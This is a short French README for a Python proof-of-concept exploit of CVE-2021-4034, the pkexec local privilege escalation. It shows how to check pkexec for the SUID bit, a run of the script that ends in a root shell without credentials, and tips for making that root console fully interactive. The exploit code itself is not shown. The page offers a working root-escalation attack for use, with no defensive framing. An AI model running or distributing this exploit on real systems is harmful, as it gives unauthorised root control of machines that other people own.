
Preuve de concept en Python pour CVE-2021-4034 qui abuse du binaire SUID pkexec pour élever les privilèges et lancer un shell root interactif sans identifiants.
CVE-2021-4034 (pkexec) L'utilisation de ce script en python exploite la vulnérabilité du fichier pkexec pour obtenir un accès root sans fournir d'identifiants
· Détecte si le binaire a les privilèges SUID, dans ce cas il est vulnérable
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· Exécute l'exploit pour obtenir un accès root, dans ce cas il suffit de l'exécuter avec python3, à la fin vous aurez une console en tant que root
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· En complément, vous pouvez changer la valeur de TERM, par exemple 'xterm' ou 'xterm-256color' pour une meilleure esthétique, et exécuter un shell différent comme 'bash' ou 'zsh', nous avons maintenant une console complètement interactive
# export TERM=xterm-256color
# zsh
root@gatogamer $